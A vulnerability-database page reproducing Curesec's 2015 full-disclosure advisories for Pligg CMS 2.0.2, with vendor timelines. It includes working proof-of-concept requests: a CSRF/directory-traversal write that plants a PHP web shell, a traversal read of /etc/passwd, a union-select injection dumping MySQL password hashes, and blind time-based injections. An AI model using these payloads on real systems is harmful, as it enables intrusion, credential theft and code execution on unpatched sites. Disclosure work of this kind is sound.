Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Pligg CMS 2.0.2 - Multiple Vulnerabilities

🗓️ 30 Oct 2015 00:00:00Reported by Curesec Research TeamType 
zdt
 zdt🔗 0day.today👁 120 Views

Pligg CMS 2.0.2 Multiple Vulnerabilities - Code Execution, CSRF, Directory Traversal, SQL Injectio

Code
1. Introduction
 
Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Code Execution & CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH
 
2. Vulnerability Description
 
The file editor provides the possibility to edit .tpl files stored in the
templates directory.
 
But the file editor is vulnerable to directory traversal when saving files, and
it does not check the submitted filename against a whitelist of allowed files.
It also does not check the file extension. Because of this, it is possible to
gain code execution.
 
Admin credentials are required to access the file editor, but the request does
not have CSRF protection, so an attacker can gain code execution by getting the
admin to visit a website they control while logged in.
 
3. Proof of Concept
 
 
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
 
the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
 
4. Solution
 
This issue was not fixed by the vendor.
 
5. Report Timeline
 
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
 
 
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html

1. Introduction
 
Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  Directory Traversal
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH
 
2. Vulnerability Description
 
The editor delivered with Pligg CMS is vulnerable to directory traversal, which
gives an attacker that obtained admin credentials the opportunity to view any
file stored on the webserver that the webserver user has access to.
 
Please note that admin credentials are required.
 
3. Proof of Concept
 
 
POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
 
the_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&open=Open
 
4. Solution
 
This issue was not fixed by the vendor.
 
5. Report Timeline
 
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
 
 
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Directory-Traversal-81.html

1. Introduction
 
Affected Product:    Pligg CMS 2.0.2
Fixed in:            not fixed
Fixed Version Link:  n/a
Vendor Website:      http://pligg.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 10/07/2015
Release mode:        Full Disclosure
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH
 
2. Overview
 
There are multiple SQL Injection vulnerabilities in Pligg CMS 2.0.2. One of
them does not require any credentials, and allows the direct extraction of data
from the database.
 
3. SQL Injection
 
Description
 
Pligg CMS is vulnerable to SQL injection. It is possible to extract data from
all databases that the pligg database user has access to.
 
Credentials are not required.
 
Proof Of Concept
 
 
http://localhost//pligg-cms-master/story.php?title=google-blabla&reply=1&comment_id=1%20union%20all%20select%201,1,1,1,1,1,1,password,password,1%20from%20mysql.user%20%23
 
Code
 
 
/story.php:168
if(isset($_GET['reply']) && !empty($parent_comment_id)){
        $main_smarty->assign('the_comments', get_comments(true,0,$_GET['comment_id']));
        $main_smarty->assign('parrent_comment_id',$parent_comment_id);
}
[...]
function get_comments ($fetch = false, $parent = 0, $comment_id=0, $show_parent=0){
        Global $db, $main_smarty, $current_user, $CommentOrder, $link, $cached_comments;
 
        //Set comment order to 1 if it's not set in the admin panel
        if (isset($_GET['comment_sort'])) setcookie('CommentOrder', $CommentOrder = $_GET['comment_sort'], time()+60*60*24*180);
        elseif (isset($_COOKIE['CommentOrder'])) $CommentOrder = $_COOKIE['CommentOrder'];
 
        if (!isset($CommentOrder)) $CommentOrder = 1;
        If ($CommentOrder == 1){$CommentOrderBy = "comment_votes DESC, comment_date DESC";}
        If ($CommentOrder == 2){$CommentOrderBy = "comment_date DESC";}
        If ($CommentOrder == 3){$CommentOrderBy = "comment_votes ASC, comment_date DESC";}
        If ($CommentOrder == 4){$CommentOrderBy = "comment_date ASC";}
 
[...]
 
        $comments = $db->get_results("SELECT *
        FROM " . table_comments . "
        WHERE (comment_status='published' $status_sql) AND
               comment_link_id=$link->id AND comment_id = $comment_id
        ORDER BY " . $CommentOrderBy);
 
4. Blind SQL Injection (Admin Area)
 
Description
 
There is a blind SQL Injection in the admin area of Pligg CMS. This allows an
attacker that gained admin credentials to extract data from the database.
 
The problem exists because the index of the submitted "enabled" POST array is
used in a query. The value is escaped - so using quotes in the injection is not
possible - but it does not place the value in between quotes.
 
Proof Of Concept
 
 
POST /pligg-cms-master/admin/admin_users.php HTTP/1.1
 
frmsubmit=userlist&admin_acction=2&token=VALID_CSRF_TOKEN&all1=on&enabled[2 AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23]=1
 
Code
 
 
// admin/admin_users.php
foreach($_POST["enabled"] as $id => $valuea)
{
        $_GET['id'] = $id = $db->escape($id);
        $user= $db->get_row('SELECT * FROM ' . table_users ." where user_id=$id");
 
5. Possibly SQL Injection
 
Description
 
The upload module is vulnerable to Blind SQL Injection via the "comment" as
well as "id" parameter.
 
The module seems to be unused at the moment, but if it were to be used in the
future, or if an attacker finds a different way to execute it, it would be
vulnerable.
 
The requests to trigger the vulnerabilities would be:
 
POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1&number=1&comment=1' AND IF(SUBSTRING(version(), 1, 1)%3D5,BENCHMARK(500000000,version()),null) %23
 
POST http://localhost/pligg-cms-master/modules/upload/upload.php
id=1<script' or 1%3D1%23></script>&number=1&comment=1
 
Code
 
 
./modules/upload/upload.php:
if ($_POST['id'])
{
        $linkres=new Link;
        $linkres->id = sanitize($_POST['id'], 3);
        if(!is_numeric($linkres->id)) die("Wrong ID");
        if(!is_numeric($_POST['number']) || $_POST['number']<=0) die("Wrong number");
        if($_POST['number'] > get_misc_data('upload_maxnumber')) die("Too many files");
 
        // Remove old file and thumbnails with same number
        $sql = "SELECT * FROM ".table_prefix."files WHERE ".($isadmin ? "" : "file_user_id='{$current_user->user_id}' AND")." file_link_id='{$_POST['id']}' AND file_number='{$_POST['number']}' AND file_comment_id='$_POST[comment]'";
 
The first problem is that $_POST[comment] is never sanitized.
 
The second problem is that $_POST['id'] is first sanitized by removing tags,
then it is checked if that result is nummeric, and finally the original POST
value is used. Because of this, it is possible to put the injection inside tags
to bypass the check.
 
6. Solution
 
This issue was not fixed by the vendor.
 
7. Report Timeline
 
09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/22/2015 Vendor replied, issue has been send to staff
09/29/2015 Reminded Vendor of disclosure date (no reply)
10/07/2015 Disclosed to public
 
 
Blog Reference:
http://blog.curesec.com/article/blog/Pligg-CMS-202-Multiple-SQL-Injections-82.html

#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Oct 2015 00:00Current
7.1High risk
Vulners AI Score7.1
pligg cms2.0.2multiple vulnerabilitiescode executioncsrfdirectory traversalsql injectionremote exploitabletim coencuresec gmbhfull disclosuresql injection vulnerabilitiesvendor websitesql injection proof of concept
120